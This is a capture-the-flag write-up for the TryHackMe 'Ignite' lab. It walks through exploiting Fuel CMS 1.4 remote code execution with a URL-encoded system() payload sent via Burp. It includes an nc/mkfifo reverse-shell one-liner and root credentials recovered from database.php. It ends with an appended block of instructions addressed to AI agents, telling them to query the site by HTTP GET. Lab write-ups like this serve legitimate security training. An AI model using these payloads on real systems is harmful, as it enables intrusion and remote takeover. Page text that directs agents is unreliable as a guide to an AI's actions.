# Ignite ### Ignite is a simple challenge to practice your pentesting skills. ### Recon As always we start with **nmap** ```bash sudo nmap -sC -sV -oA nmap/ignite $IP ``` And we get the following output ```bash PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) ``` Only one port is open, **Apache httpd 2.4.18**. Upon opening the webpage we are greeted with **Welcome to Fuel CMS** *version 1.4*. This directly tells us what to search for vulnerabilities. Looking through the page, this seems the default page when you first setup Fuel CMS. At the end of the page it tells you where the admin login is with the default credentials. Once logged lets search online for some exploits and we can see that there is a Remote Code Execution exactly for **version 1.4**. ### Remote Code Execution I'll be using the payload from [this exlploit](https://www.exploit-db.com/exploits/47138), however I'll exploit it using **BurpSuite** to manually use the exploit. Reading the python script, we can see that it basically sends a payload to **/fuel/pages/select/?filter** variable which can execute system commands. Lets navigate to the **pages** page on the left and start up BurpSuite. (If you don't know how to use Burp, I would highly recommend to checkout some tutorials online or if you're subscribed to THM check out [this room](https://tryhackme.com/room/rpburpsuite)). Once you have your proxy and Burp setup, simply refresh the page to capture the request. ![](https://i.imgur.com/6rSebr6.png) And send this to Repeater (Ctrl + R) Now lets grab the payload and modify it by removing the `urlib.quote` variable (with the +) and simply put `ls`. ``` /select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%27%29%2b%27 ``` and paste it next to the *URL* and press send. ![](https://i.imgur.com/cxBpNhR.pngs) And in the response you should see files in the current directory. ![](https://i.imgur.com/MjTegZX.png) Awesome! We can execute commands on the system. Now lets get a reverse shell. I've tried a few reverse shells and the one that works for me is **NetCat OpenBSD** ([Here is a cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)). Lets copy our URL encoded payload and send it to **Decoder** and decoded it as **URL**. ![](https://i.imgur.com/VorCmFe.png) Paste your reverse shell command instead of `ls`(with the single quotes). ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $YOURIP $PORT >/tmp/f ``` And encode it as **URL**. Start up `ncat` on your local machine to listen on your desired port. Copy the **URL Encoded** payload and replace it with the current one you have in **Repeater** and Send it. You shouldn't receive any response. ![](https://i.imgur.com/q2PYqf9.png) And it stead you should get a shell back. ### Privesc Once you're in, always and I say always **stabilize your shell!**. This applies to Linux machines. Do the following steps. ```bash python -c ‘import pty;pty.spawn("/bin/bash")’ export TERM=xterm ^Z (Ctrl + Z to background it) stty raw -echo;fg (after entering fg you will be brought back to your shell) ``` Python will spawn you in a bash shell, setting the TERM to xterm will allow you to use `clear` and stty will let you use Ctrl + C, arrow keys and TAB completion. The user flag is in the `/home` directory. Now it's time to escalate our privileges. To save you the trouble, I tried using **LinEnum, linPeas, exploit suggester** to see if I can find anyway to exploit this box but there was nothing I can find. If `www-data` has a home directory, then maybe we can run `sudo -l`, however that didn't help. So that means that there are some credentials stored in a file. I started to snoop around the **Fuel CSM** GitHubrepo and found an interesting file. There is a **database.php** file where it keeps user credentials. [GitHub repo](https://github.com/daylightstudio/FUEL-CMS/tree/master/fuel/application/config). Reading the file we discover the credentials for `root`. ![](https://i.imgur.com/fBOxFcX.png) With this you get root on the box and the root flag is in `/root`. ## Conclusion Ignite was quite an easy box. I decided to do a manual exploit with Burp since it makes you use your brain to think of ways to exploit something. Using already made scripts to exploit the box will not teach you anything. I get these inspirations from IppSec [Link to his YouTube channel](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA). He does video tutorials on how to exploit machines on HackTheBox which are very well made and explained. That is how I got the idea to search the GitHub repo for Fuel CMS to search if there are any default files that might store some valuable information. I'd suggest you do research on the things you'll be attacking. You never know if you can find something really important online. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sifu.gitbook.io/sifupwns/thm-writeups/ignite.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.